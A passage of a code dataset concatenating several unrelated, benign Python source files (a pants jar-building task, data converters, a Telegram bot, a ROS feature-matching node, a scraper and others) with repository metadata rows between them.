if contents is None or not isinstance(contents, Compatibility.bytes):
raise ValueError('The contents must be a sequence of bytes')
self._add_entry(self.MemoryEntry(path, contents))
def _add_entry(self, entry):
if Manifest.PATH == entry.dest:
self._manifest = entry
else:
self._entries.append(entry)
def writejar(self, jar):
"""Schedules all entries from the given ``jar``'s to be added to this jar save for the manifest.
:param string jar: the path to the pre-existing jar to graft into this jar
"""
if not jar or not isinstance(jar, Compatibility.string):
raise ValueError('The jar path must be a non-empty string')
self._jars.append(jar)
@contextmanager
def _render_jar_tool_args(self):
args = []
if self._main:
args.append('-main=%s' % self._main)
if self._classpath:
args.append('-classpath=%s' % ','.join(self._classpath))
with temporary_dir() as stage_dir:
if self._manifest:
args.append('-manifest=%s' % self._manifest.materialize(stage_dir))
if self._entries:
def as_cli_entry(entry):
src = entry.materialize(stage_dir)
return '%s=%s' % (src, entry.dest) if entry.dest else src
args.append('-files=%s' % ','.join(map(as_cli_entry, self._entries)))
if self._jars:
args.append('-jars=%s' % ','.join(self._jars))
yield args
class JarTask(NailgunTask):
"""A baseclass for tasks that need to create or update jars.
All subclasses will share the same underlying nailgunned jar tool and thus benefit from fast
invocations.
"""
_CONFIG_SECTION = 'jar-tool'
_JAR_TOOL_CLASSPATH_KEY = 'jar_tool'
@staticmethod
def _flag(bool_value):
return 'true' if bool_value else 'false'
_DUPLICATE_ACTION_TO_NAME = {
Duplicate.SKIP: 'SKIP',
Duplicate.REPLACE: 'REPLACE',
Duplicate.CONCAT: 'CONCAT',
Duplicate.FAIL: 'THROW',
}
@classmethod
def _action_name(cls, action):
name = cls._DUPLICATE_ACTION_TO_NAME.get(action)
if name is None:
raise ValueError('Unrecognized duplicate action: %s' % action)
return name
def __init__(self, *args, **kwargs):
super(JarTask, self).__init__(*args, **kwargs)
self.set_distribution(jdk=True)
# TODO(John Sirois): Consider poking a hole for custom jar-tool jvm args - namely for Xmx
# control.
self.register_jvm_tool_from_config(self._JAR_TOOL_CLASSPATH_KEY, self.context.config,
ini_section=self._CONFIG_SECTION,
ini_key='bootstrap-tools',
default=['//:jar-tool'])
@property
def config_section(self):
return self._CONFIG_SECTION
def prepare(self, round_manager):
round_manager.require_data('resources_by_target')
round_manager.require_data('classes_by_target')
@contextmanager
def open_jar(self, path, overwrite=False, compressed=True, jar_rules=None):
"""Yields a Jar that will be written when the context exits.
:param string path: the path to the jar file
:param bool overwrite: overwrite the file at ``path`` if it exists; ``False`` by default; ie:
update the pre-existing jar at ``path``
:param bool compressed: entries added to the jar should be compressed; ``True`` by default
:param jar_rules: an optional set of rules for handling jar exclusions and duplicates
"""
jar = Jar()
try:
yield jar
except jar.Error as e:
raise TaskError('Failed to write to jar at %s: %s' % (path, e))
with jar._render_jar_tool_args() as args:
if args: # Don't build an empty jar
args.append('-update=%s' % self._flag(not overwrite))
args.append('-compress=%s' % self._flag(compressed))
jar_rules = jar_rules or JarRules.default()
args.append('-default_action=%s' % self._action_name(jar_rules.default_dup_action))
skip_patterns = []
duplicate_actions = []
for rule in jar_rules.rules:
if isinstance(rule, Skip):
skip_patterns.append(rule.apply_pattern)
elif isinstance(rule, Duplicate):
duplicate_actions.append('%s=%s' % (rule.apply_pattern.pattern,
self._action_name(rule.action)))
else:
raise ValueError('Unrecognized rule: %s' % rule)
if skip_patterns:
args.append('-skip=%s' % ','.join(p.pattern for p in skip_patterns))
if duplicate_actions:
args.append('-policies=%s' % ','.join(duplicate_actions))
args.append(path)
jvm_args = self.context.config.getlist('jar-tool', 'jvm_args', default=['-Xmx64M'])
self.runjava(self.tool_classpath(self._JAR_TOOL_CLASSPATH_KEY),
'com.twitter.common.jar.tool.Main',
jvm_options=jvm_args,
args=args,
workunit_name='jar-tool',
workunit_labels=[WorkUnit.TOOL, WorkUnit.JVM, WorkUnit.NAILGUN])
class JarBuilder(AbstractClass):
"""A utility to aid in adding the classes and resources associated with targets to a jar."""
@staticmethod
def _write_agent_manifest(agent, jar):
# TODO(John Sirois): refactor an agent model to support 'Boot-Class-Path' properly.
manifest = Manifest()
manifest.addentry(Manifest.MANIFEST_VERSION, '1.0')
if agent.premain:
manifest.addentry('Premain-Class', agent.premain)
if agent.agent_class:
manifest.addentry('Agent-Class', agent.agent_class)
if agent.can_redefine:
manifest.addentry('Can-Redefine-Classes', 'true')
if agent.can_retransform:
manifest.addentry('Can-Retransform-Classes', 'true')
if agent.can_set_native_method_prefix:
manifest.addentry('Can-Set-Native-Method-Prefix', 'true')
jar.writestr(Manifest.PATH, manifest.contents())
@abstractproperty
def _context(self):
"""Implementations must supply a context."""
def add_target(self, jar, target, recursive=False):
"""Adds the classes and resources for a target to an open jar.
:param jar: An open jar to add to.
:param target: The target to add generated classes and resources for.
:param bool recursive: `True` to add classes and resources for the target's transitive
internal dependency closure.
:returns: The list of targets that actually contributed classes or resources or both to the
jar.
"""
classes_by_target = self._context.products.get_data('classes_by_target')
resources_by_target = self._context.products.get_data('resources_by_target')
targets_added = []
def add_to_jar(tgt):
target_classes = classes_by_target.get(tgt)
target_resources = []
# TODO(pl): https://github.com/pantsbuild/pants/issues/206
resource_products_on_target = resources_by_target.get(tgt)
if resource_products_on_target:
target_resources.append(resource_products_on_target)
if tgt.has_resources:
target_resources.extend(resources_by_target.get(r) for r in tgt.resources)
if target_classes or target_resources:
targets_added.append(tgt)
def add_products(target_products):
if target_products:
for root, products in target_products.rel_paths():
for prod in products:
jar.write(os.path.join(root, prod), prod)
add_products(target_classes)
for resources_target in target_resources:
add_products(resources_target)
if tgt.is_java_agent:
self._write_agent_manifest(tgt, jar)
if recursive:
target.walk(add_to_jar)
else:
add_to_jar(target)
return targets_added
def prepare_jar_builder(self):
"""Prepares a ``JarTask.JarBuilder`` for use during ``execute``.
This method should be called during task preparation to ensure the classes and resources needed
for jarring targets are mapped by upstream tasks that generate these.
"""
class PreparedJarBuilder(self.JarBuilder):
@property
def _context(me):
return self.context
return PreparedJarBuilder()
| fakeNetflix/square-repo-pants | src/python/pants/backend/jvm/tasks/jar_task.py | jar_task.py | py | 12,978 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "twitter.common.lang.AbstractClass",
"line_number": 31,
"usage_type": "name"
},
{
"api_name": "abc.abstractmethod",
"line_number": 42,
"usage_type": "name"
},
{
"api_name": "tempfile.mkstemp",
"line_number": 70,
"usage_type": "call"
},
{
"api_name": ... |
22016755038 | import pandas as pd
import numpy as np
from scipy.io import savemat
import os
def csv_to_spm_vectors(csv_path):
for root, dirs, files in os.walk(csv_path):
for name in files:
if name.endswith(".csv"):
csv_file = os.path.join(root, name)
df = pd.read_csv(csv_file,delimiter=";")
sub_name = csv_file[-10:-4]
cleanup = ['onsets','durations']
for key in cleanup:
for ii,_ in enumerate(df[key]):
string = df[key][ii].replace("\n","").replace(",","")[1:-1].split(" ")
string = list(filter(None, string))
array = np.array(string,dtype=np.float64)
df[key][ii]=array
new_dict = {"sub":sub_name,
"sync_onset":df["onsets"][0],
"osync_onset":df["onsets"][1],
"mine_onset":df["onsets"][2],
"other_onset":df["onsets"][3],
"sync_duration":df["durations"][0],
"osync_duration":df["durations"][1]}
output_name = csv_path + sub_name + "_vectors.mat"
savemat(output_name,{"vectors":new_dict}) | paradeisios/old_thesis_code | PPI_analysis/utils/csv_to_spm_vectors.py | csv_to_spm_vectors.py | py | 1,283 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.walk",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "pandas.read_csv",
"line_number":... |
1409824498 | import threading
import time
from subprocess import Popen, PIPE, CalledProcessError
from redis import Redis
from rq import Queue
import sys
import os
import shutil
# Connect to Redis
redis_conn = Redis(host='localhost', port=6379, db=0)
# Create an RQ queue
queue = Queue(connection=redis_conn)
def read_output(pipe, task_id):
job = queue.fetch_job(task_id)
output = '' # Initialize an empty string to store the output
for line in iter(pipe.readline, ''):
output += line # Accumulate the output as it is generated
sys.stderr.flush()
# Save the output to job.meta as it is generated
job.meta['progress'] = output
job.save_meta()
def task(task_id, input_path, output_path, model_name, tta=False):
try:
upscale_command = [
'./upscale/upscayl',
'-i', input_path,
'-o', output_path,
'-n', model_name
]
if tta:
upscale_command.append("-x")
with Popen(upscale_command, stderr=PIPE, stdout=PIPE, bufsize=1, universal_newlines=True) as p:
stdout_thread = threading.Thread(target=read_output, args=(p.stdout, task_id))
stderr_thread = threading.Thread(target=read_output, args=(p.stderr, task_id))
stdout_thread.start()
stderr_thread.start()
# Wait for the subprocess to complete
p.wait()
# Wait for the output threads to finish
stdout_thread.join()
stderr_thread.join()
if p.returncode != 0:
raise CalledProcessError(p.returncode, p.args)
except Exception as e:
raise e
finally:
if os.path.exists(input_path):
shutil.rmtree(os.path.dirname(input_path))
| ASparkOfFire/fastapi-rq-example | job.py | job.py | py | 1,772 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "redis.Redis",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "rq.Queue",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "sys.stderr.flush",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "sys.stderr",
"line_number":... |
23164271375 | from PIL import Image, ImageOps
import cv2
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torchvision
import torchvision.transforms as transforms
import time
import pandas as pd
# import json
from IPython.display import clear_output
torch.set_printoptions(linewidth=120)
torch.set_grad_enabled(True)
face_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_default.xml')
class Network(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(in_channels=1, out_channels=6, kernel_size=5)
self.conv2 = nn.Conv2d(in_channels=6, out_channels=12, kernel_size=5)
self.fc1 = nn.Linear(in_features=12*9*9, out_features=120)
self.fc2 = nn.Linear(in_features=120, out_features=60)
self.out = nn.Linear(in_features=60, out_features=7)
def forward(self, t):
t = self.conv1(t)
t = F.relu(t)
t = F.max_pool2d(t, kernel_size=2, stride=2)
t = self.conv2(t)
t = F.relu(t)
t = F.max_pool2d(t, kernel_size=2, stride=2)
t = t.reshape(-1, 12*9*9)
t = self.fc1(t)
t = F.relu(t)
t = self.fc2(t)
t = F.relu(t)
t = self.out(t)
return t
class webopencv(object):
def __init__(self):
pass
def process(self):
model = torch.load("modelResults.pt")
torch.save(model.state_dict(), "model_state_dict.pt")
w = webopencv()
w.process()
| jain-aniket/attentiveness-flask | testtorchloading.py | testtorchloading.py | py | 1,388 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "torch.set_printoptions",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "torch.set_grad_enabled",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "cv2.CascadeClassifier",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "c... |
74431864103 | from fastapi import FastAPI
import requests
import uvicorn
app = FastAPI()
@app.get("/")
async def get_product():
req=requests.get("https://world.openfoodfacts.org/api/v0/product/3033491270864.json")
if req.status_code==200:
res=req.json()
return(res)
if __name__=='__main__':
uvicorn.run(app, host="127.0.0.1", port=8000) | apollineguerineau/TP5 | main.py | main.py | py | 352 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "fastapi.FastAPI",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "uvicorn.run",
"line_number": 14,
"usage_type": "call"
}
] |
6369818660 | '''
This script compiles the requirements for the bot and runs it on a loop
It should also contain the functions of the bot
'''
from config import *
from core import *
import telegram
import datetime
import time
from telegram.ext import Updater, CommandHandler, MessageHandler, Filters, \
ConversationHandler, CallbackQueryHandler
import logging
import random
from pytz import timezone
import emojis
import argparse
import utils.db_utils as db_utils
import argparse
print('initialising')
# checks if this should be run ion testing env
parser = argparse.ArgumentParser(description='Runs the leobot service')
parser.add_argument('-t', '--testing', type=bool, help='Whether you want to run in testing env')
args = parser.parse_args()
# setting up deployment environment env (REMOVE IF YOU ARE NOT USING env FILE BUT IT IS GOOD PRACTICE)
testing = args.testing
print('Testing value:', testing)
import configparser
config = configparser.ConfigParser()
config.read('bot.cfg')
if testing:
bot_config = dict(config['test_bot'])
print(str(config))
dbi = db_utils.Database(config, 'test_db')
else:
bot_config = config['live_bot']
dbi = db_utils.Database(config, 'live_db')
# TODO: ACTUAL DEPLOYMENT CHANGE
owner = config['owners']['fei']
updater = Updater(token=bot_config['token'], use_context=True)
dispatcher = updater.dispatcher # for quicker access to the dispatcher object
jobqueuer = updater.job_queue # for quicker access to JobQueue object
# logs the problems in log.md file with level INFO
logging.basicConfig(filename='storage/error_log.txt', format='%(asctime)s - %(name)s - \
%(levelname)s - %(message)s', level=logging.INFO)
print('finish setting up logging')
core_utils.setup_bot_data(dispatcher, owner, bot_config, dbi, testing)
msg_return = dispatcher.bot.send_message(owner, bot_init_msg) # informs the owners that it is intialised
print('Message Return', str(msg_return))
################
# TESTING ZONE #
################
# dbi.new_category('Testimony', des= 'Heartfelt personal sharing')
# dbi.cat_id('Testimony')
# def process_members(update, context):
# '''
# Processes the changes in member data i.e. when the user first starts the bot.
# This function being in group 0 make sure it is the highest priority and runs in parallel with other
# callback functions
# '''
# # for easier access to user_id
# user_id = update.message.from_user.id
# # initiates the user if it is his first time
# initiate_user(user_id, update, context) # in utils
# # updates the permission according to quits by the coder
# # check_for_personal_changes(update, context)
# dispatcher.add_handler(MessageHandler(Filters.text, process_members), group=0) # gives most prirority
new_thread_conv = ConversationHandler(
entry_points=[CommandHandler('new_thread', new_thread)],
states={
TITLE: [MessageHandler(Filters.text & ~Filters.command, t_title)],
CAT: [MessageHandler(Filters.text & ~Filters.command, t_cat)],
BODY: [MessageHandler(Filters.text & ~Filters.command, t_body)],
FILE: [core_utils.file_handler(t_file),
CommandHandler('no', t_file)],
TAGS: [MessageHandler(Filters.text & ~Filters.command, t_tags)],
TC: [MessageHandler(Filters.text & ~Filters.command, tc_next)]
},
fallbacks= [CommandHandler('cancel', cancel),
CommandHandler('end', end)],
map_to_parent= {
COMPLETED: MENU,
END: END,
CANCEL: MENU
}
)
feedback_conv = ConversationHandler(
entry_points=[CommandHandler('feedback', fb_init)],
states={
TITLE: [MessageHandler(Filters.text & ~Filters.command, \
fb_title)],
BODY: [MessageHandler(Filters.text & ~Filters.command, fb_body)],
FILE: [core_utils.file_handler(fb_file),
CommandHandler('no', fb_file)]
},
fallbacks= [CommandHandler('cancel', cancel),
CommandHandler('end', end)],
map_to_parent= {
COMPLETED: MENU,
END: END,
CANCEL: MENU
}
)
admin_conv = ConversationHandler(
entry_points=[CommandHandler('admin_menu', admin_menu)],
states={
MENU: [CommandHandler('sview_fb', sview_fb),
CommandHandler('dview_fb', dview_fb),
CommandHandler('ch_perm', ch_perm),
CommandHandler('all_members', all_members),
CommandHandler('del_threads', del_threads)
],
},
fallbacks= [CommandHandler('quit', quit_m),
CommandHandler('end', end)],
map_to_parent= {
END: END,
QUIT: MENU
}
)
be_conv = ConversationHandler(
entry_points=[CommandHandler('backend', admin_menu)],
states={
MENU: [],
},
fallbacks= [CommandHandler('quit', quit_m),
CommandHandler('end', end)],
map_to_parent= {
END: END,
QUIT: MENU
}
)
start_conv = ConversationHandler(
entry_points=[CommandHandler('start', start)],
states={
MENU: [
new_thread_conv,
feedback_conv,
admin_conv,
],
END: [CommandHandler('start', start)],
TIMEOUT: [MessageHandler(Filters.text, timeout)]
},
fallbacks= [CommandHandler('end', end)],
conversation_timeout=600
)
# def not_command(update, context):
# '''
# Processes messages that are not commands i.e. a response to a prompt by the bot
# Make sure this is the last callback function to grant lowest priority to because this means that
# the person is clearly not trying to call another function
# '''
# update.message.reply_text('Not real command')
# dispatcher.add_handler(MessageHandler(Filters.command, not_command), group=1)
dispatcher.add_handler(CommandHandler('help', help_fns))
dispatcher.add_handler(CommandHandler('cache', cache))
dispatcher.add_handler(start_conv)
def remind_events(context):
# TODO: Make bot record events and remind people
inform_owners(daily_msg, context)
event_reminder = jobqueuer.run_daily(callback=remind_events,\
time=datetime.time(8, 0, 0, 0, tzinfo=timezone('Singapore')))
updater.start_polling()
dbi.close()
| ollayf/leobot | main.py | main.py | py | 6,203 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "configparser.ConfigParser",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "config.read",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "utils.d... |
30922250366 | #!/usr/bin/env python
# from __future__ import division
import numpy as np
import message_filters
from matplotlib import pyplot as plt
import imutils
from time import time, sleep
# import os
from sensor_msgs.msg import Image
from geometry_msgs.msg import Point, Pose, Quaternion, Vector3
from cv_bridge import CvBridge, CvBridgeError
import rospy
import copy
# import stereoDepth as SD
# from sklearn import linear_model, datasets
from nav_msgs.msg import Odometry # We need this message type to read position and attitude from Bebop nav_msgs/Odometry
from geometry_msgs.msg import Twist
from geometry_msgs.msg import Point
from std_msgs.msg import Empty
# import PlaneRANSAC as PR
from itertools import compress
import tf
from optic_flow_example.msg import OpticFlowMsg
import cPickle
import sys
# from pykalman import UnscentedKalmanFilter
# from robust_kalman import RobustKalman
# from robust_kalman.utils import HuberScore, VariablesHistory, WindowStatisticsEstimator
from sklearn.cluster import KMeans
# from sklearn.linear_model import RANSACRegressor
ros_path = '/opt/ros/kinetic/lib/python2.7/dist-packages'
if ros_path in sys.path:
sys.path.remove(ros_path)
import cv2
sys.path.append('/opt/ros/kinetic/lib/python2.7/dist-packages')
keypoints = cPickle.loads(open("./keypoints.txt").read())
kp = []
for point in keypoints:
temp = cv2.KeyPoint(x=point[0][0],y=point[0][1],_size=point[1], _angle=point[2], _response=point[3], _octave=point[4], _class_id=point[5])
kp.append(temp)
des_img_des = np.loadtxt('descriptors.txt', dtype = float)
a = des_img_des
# a1 = np.loadtxt('descriptors1.txt', dtype = float)
rolavnum = 4
it = 0
# Rolling average
xarr = np.zeros(rolavnum)
yarr = np.zeros(rolavnum)
flow_x = 0
flow_y = 0
# Camera focal length [pixel]
f = 202
# Stereo base distance [mm]
B = 30
prev_time = 0
x_prev = 0
y_prev = 0
prev_image = None
last_time = 0
lk_params = dict( winSize = (15,15),
maxLevel = 2,
criteria = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03))
bridge = CvBridge()
points_to_track = []
center_pub = rospy.Publisher("/wall_center_point",Point)
contours_pub = rospy.Publisher('/mask', Image, queue_size=1)
def totuple(a):
try:
return tuple(totuple(i) for i in a)
except TypeError:
return a
def defpoints(image, spacing):
points_to_track = []
for x in range(0,image.shape[0],spacing):
for y in range(0,image.shape[1],spacing):
new_point = [y, x]
points_to_track.append(new_point)
points_to_track = np.array(points_to_track, dtype=np.float32) # note: float32 required for opencv optic flow calculations
points_to_track = points_to_track.reshape(points_to_track.shape[0], 1, points_to_track.shape[1]) # for some reason this needs to be shape (npoints, 1, 2)
return points_to_track
def writeOdom(data):
global global_pos
global global_vel
global_pos=data.pose.pose
global_vel=data.twist.twist
def rundetection():
rospy.init_node('feature_detection', anonymous=True)
right_sub = message_filters.Subscriber("/image_raw_throttled", Image, queue_size=10)#,heyo1)#,queue_size=4)
left_sub = message_filters.Subscriber("/image_raw_throttled", Image, queue_size=10)#,heyo2)#,queue_size=4)
rospy.Subscriber('/bebop/odom', Odometry, writeOdom)
ts = message_filters.TimeSynchronizer([left_sub,right_sub],10)
# ts.registerCallback(OpticalFlow)
ts.registerCallback(PoseEstimate)
rospy.spin()
def featuredetect(img):
numFeatures = 500
surf = cv2.xfeatures2d.SURF_create(numFeatures)
kp, des = surf.detectAndCompute(img,None)
# draw only keypoints location,not size and orientation
img2 = cv2.drawKeypoints(img,kp,None,color=(0,255,0), flags=0)
return kp, des
def featurecompare(des1, des2):
matcher = cv2.DescriptorMatcher_create(cv2.DescriptorMatcher_FLANNBASED)
matches = matcher.knnMatch(np.asarray(des1,np.float32),np.asarray(des2,np.float32), 2) #2
return matches
def plotter(image, points, points1, points2, cc, col, col1, col2):
color_img = image
if cc == 0:
color_img = cv2.cvtColor(image, cv2.COLOR_GRAY2BGR)
color = col # bgr colorspace
color1 = col1
color2 = col2
linewidth = 3
for x,y in points:
cv2.circle(color_img, (int(x),int(y)), 5 , color, thickness = linewidth) # draw a red line from the point with vector = [vx, vy]
for x,y in points1:
cv2.circle(color_img, (int(x),int(y)), 5 , color1, thickness = linewidth) # draw a red line from the point with vector = [vx, vy]
# for x,y in points2:
cv2.circle(color_img, (int(points2[0]),int(points2[1])), 5 , color2, thickness = linewidth) # draw a red line from the point with vector = [vx, vy]
return color_img
# plt.cla()
# # plt.plot(color_img)
# plt.imshow(color_img)
# # plt.show()
# plt.pause(0.05)
# cv2.imshow('tracked image',color_img)
# cv2.waitKey(1)
def plotavg(image, point, cc):
color_img = image
if cc == 0:
color_img = cv2.cvtColor(image, cv2.COLOR_GRAY2BGR)
color = [0,255,0] # bgr colorspace
linewidth = 3
# for x,y in points:
cv2.circle(color_img, (int(point[0]),int(point[1])), 5 , color, thickness = linewidth) # draw a red line from the point with vector = [vx, vy]
plt.cla()
# plt.plot(color_img)
plt.imshow(color_img)
# plt.show()
plt.pause(0.05)
def find_squares(img):
gray_new = img
# gray_new = cv2.cvtColor(img,cv2.COLOR_RGB2GRAY)
# edges are preserved while doing median blur while removing noise
gra = cv2.medianBlur(gray_new,5)
#image normalization
gray = np.zeros(gra.shape)
gray = cv2.normalize(gra, gray, 0, 255, cv2.NORM_MINMAX)
# adaptive threshold
thresh = cv2.adaptiveThreshold(gray,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,\
cv2.THRESH_BINARY,17,2)
# erode out the noise
thresh = cv2.erode(thresh,np.ones((3,3), np.uint8),iterations=1)
im, cnts, hierarchy = cv2.findContours(thresh, cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
drawing = np.zeros((thresh.shape[0], thresh.shape[1], 3), np.uint8)
# draw contours
for i in range(len(cnts)):
color_contours = (255, 255, 255)
# draw contours in a black image
cv2.drawContours(drawing, cnts, i, color_contours, 1, 8, hierarchy)
# do dilation after finding the
drawing1 = cv2.dilate(drawing, np.ones((3,3), np.uint8), iterations=9)
img_not = np.zeros((drawing1.shape[0], drawing1.shape[1], 3), np.uint8)
img_not = cv2.bitwise_not(drawing1)
mask = cv2.cvtColor(img_not, cv2.COLOR_BGR2GRAY)
im1, cnts1, hierarchy1 = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cnt_area = []
cnt_num = []
for c in cnts1:
cnt_area.append(cv2.contourArea(c))
cnt_num = np.argsort(cnt_area)
cnt_area.sort()
large_cnts = np.zeros(np.shape(mask))
cnts_oi=[]
for i in range(5): # in the 5 largest contours, check if cnt_area > 5000
if cnt_area[len(cnt_area)-1-i] > 5000:
fresh_im = np.zeros(np.shape(mask))
cv2.drawContours(fresh_im, cnts1, cnt_num[len(cnt_num)-1-i], (255, 255, 255), -1)
im_temp = 255*np.ones(mask.shape) - fresh_im
cv2.drawContours(large_cnts, cnts1, cnt_num[len(cnt_num)-1-i], (255, 255, 255), -1)
cnts_oi.append(cnts1[cnt_num[len(cnt_num)-1-i]])
# dilate large conoturs
large_cnts = cv2.dilate(large_cnts, np.ones((5,5), np.uint8), iterations=1)
new_gray = cv2.bitwise_and(gray_new, gray_new, mask = np.uint8(large_cnts))
# cv2.imshow('mas',new_gray)
return new_gray, cnts_oi
class Queue:
#Constructor creates a list
def __init__(self):
self.queue = list()
#Adding elements to queue
def enqueue(self,data):
#Checking to avoid duplicate entry (not mandatory)
if data not in self.queue:
self.queue.insert(0,data)
return True
return False
#Removing the last element from the queue
def dequeue(self):
if len(self.queue)>0:
return self.queue.pop()
return ("Queue Empty!")
#Getting the size of the queue
def size(self):
return len(self.queue)
#printing the elements of the queue
def printQueue(self):
return self.queue
points_max_cx = Queue()
points_max_cy = Queue()
def PoseEstimate(leftImg,rightImg):
global it
left_image = bridge.imgmsg_to_cv2(leftImg, desired_encoding="mono8")
img = left_image
large_cnts = 0
img, cnts_oi = find_squares(img)
b1 = 0
kp1, des1 = featuredetect(left_image)
cur_img_des = des1
b = cur_img_des
matches = featurecompare(cur_img_des, des_img_des)
points = np.zeros((len(matches),2))
delta = np.zeros((len(matches),2))
dist = np.zeros((len(matches)))
matchMask = np.zeros((len(matches),2))
# ratio test as per Lowe's paper
# source: https://opencv-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_feature2d/py_matcher/py_matcher.html
if len(matches)!=0:
for i in range(0,len(matches)-1):
points[i] = kp1[matches[i][0].queryIdx].pt#features[m.queryIdx]]
if matches[i][0].distance < 0.8*matches[i][1].distance:
matchMask[i]=[1,0]
matchMaskbool = matchMask.astype('bool')
points = points[matchMaskbool[:,0]]
# Finding points inside contours
# y = 0
points_new = []#np.zeros((len(matches),2))
for x in range(len(points)):
for l in range(len(cnts_oi)):
# print(points[x].tolist())
point = (int(points[x][0]), int(points[x][1]))
dist = cv2.pointPolygonTest(cnts_oi[l],point,False)
if dist >= 0:
points_new.append(points[x])
# y = y+1
# Finding average points
# classifications, centers = kmeans(points_new)
clusters_num = 3
if len(points_new)<clusters_num:
clusters_num = len(points_new)
if clusters_num:
print(clusters_num)
estimator = KMeans(n_clusters=clusters_num)
estimator.fit(points_new)
# Ck's are the different clusters with corresponding point indices
c1 = np.where(estimator.labels_ == 0)[0]
c2 = np.where(estimator.labels_ == 1)[0]
c3 = np.where(estimator.labels_ == 2)[0]
max_len = len(c1)
max_c = 0
max_con = c1
if len(c2) > max_len:
max_len = len(c2)
max_c = 1
max_con = c2
if len(c3) > max_len:
max_len = len(c3)
max_c = 2
max_con = c3
points_max_c = []
# print(points_new[max_con[0]][:])
for i in range(max_len):
points_max_c.append(points_new[max_con[i]][:])
max_cx = estimator.cluster_centers_[max_c][0]
max_cy = estimator.cluster_centers_[max_c][1]
if it<rolavnum:
points_max_cx.enqueue(max_cx)
points_max_cy.enqueue(max_cy)
else:
points_max_cx.dequeue()
points_max_cy.dequeue()
points_max_cx.enqueue(max_cx)
points_max_cy.enqueue(max_cy)
it = it + 1
x = 0
y = 0
temo1 = points_max_cx.printQueue()
temo2 = points_max_cy.printQueue()
for i in range (points_max_cy.size()):
x = x + temo1[i]
y = y + temo2[i]
# rolling avg centroid
x = int(x/points_max_cy.size())
y = int(y/points_max_cy.size())
outt = Point()
outt.x=x
outt.y=y
center_pub.publish(outt)
# plotavg(img,(x,y),0)
centroid = [x,y]
# # plotter(img,np.array(points_new),0, (255, 0, 0))
pub_cv = plotter(img, points_new, points_max_c, centroid, 0, (255, 0, 0), (0, 0, 255), (0, 255, 0))
contours_pub.publish(bridge.cv2_to_imgmsg(pub_cv, "rgb8"))
if __name__ == '__main__':
try:
rundetection()
except rospy.ROSInterruptException:
pass
| tkurtiak/Project4b | matchfeat_old.py | matchfeat_old.py | py | 12,217 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sys.path",
"line_number": 37,
"usage_type": "attribute"
},
{
"api_name": "sys.path.remove",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 39,
"usage_type": "attribute"
},
{
"api_name": "sys.path.append",
"li... |
74105436582 | import sqlite3
from sklearn.ensemble import RandomForestClassifier
from sklearn.feature_extraction.text import TfidfVectorizer
from datetime import datetime as dt
from sklearn.externals import joblib
start_time = dt.now()
# data loading
conn = sqlite3.connect("textarray.db")
cur = conn.cursor()
query = '''SELECT * from train'''
cur.execute(query)
y_train, names, descs, X_train = [], [], [], []
for c, n, d, w in cur.fetchall():
y_train.append(c)
names.append(n)
descs.append(d)
X_train.append(w)
vectorizer = joblib.load('vect.pkl')
XtrV = vectorizer.fit_transform(X_train).toarray() # X-Train-Vectorized
RF = RandomForestClassifier(n_estimators=100,
max_depth=9,
n_jobs=4)
RF.fit(XtrV, y_train)
joblib.dump(RF, 'RF.pkl', compress=9)
# validation on the test set
query = '''SELECT * from test'''
cur.execute(query)
y_test, names, descs, X_test = [], [], [], []
for c, n, d, w in cur.fetchall():
y_test.append(c)
names.append(n)
descs.append(d)
X_test.append(w)
test_size = len(y_test)
XteV = vectorizer.transform(X_test).toarray() # X-Test-Vectorized
pred = RF.predict(XteV)
for i in range(test_size):
cur.execute('''UPDATE test SET cat=? WHERE name=?''', (pred[i], names[i]))
print('Estimated: {0}'.format(dt.now()-start_time))
| kirilenkobm/ML_examples | RandomForestClf.py | RandomForestClf.py | py | 1,335 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "datetime.datetime.now",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "sqlite3.connect",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "sklearn.external... |
25617944185 | import numpy as np
from bs4 import BeautifulSoup
import pandas as pd
import requests
import time
import json
from tomlkit import array
URL = "https://covid19.riau.go.id/pantauan_data_kasus"
HEADERS = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36'
}
FILEDIR = "./"
FILENAME = "covid19-data-riau"
start_time = time.time()
r = requests.get(URL, headers=HEADERS).text
soup = BeautifulSoup(r, "html.parser")
section_title = soup.find("div", class_="section-title").text.strip()
city_list = soup.find_all("a", attrs={"href": lambda txt: "corona.riau" in txt.lower()})
all_cases = soup.find_all("td", class_="text-right")
labels = soup.find_all("th", class_="text-center")
labels = [label.text.strip() for label in labels]
# print(labels)
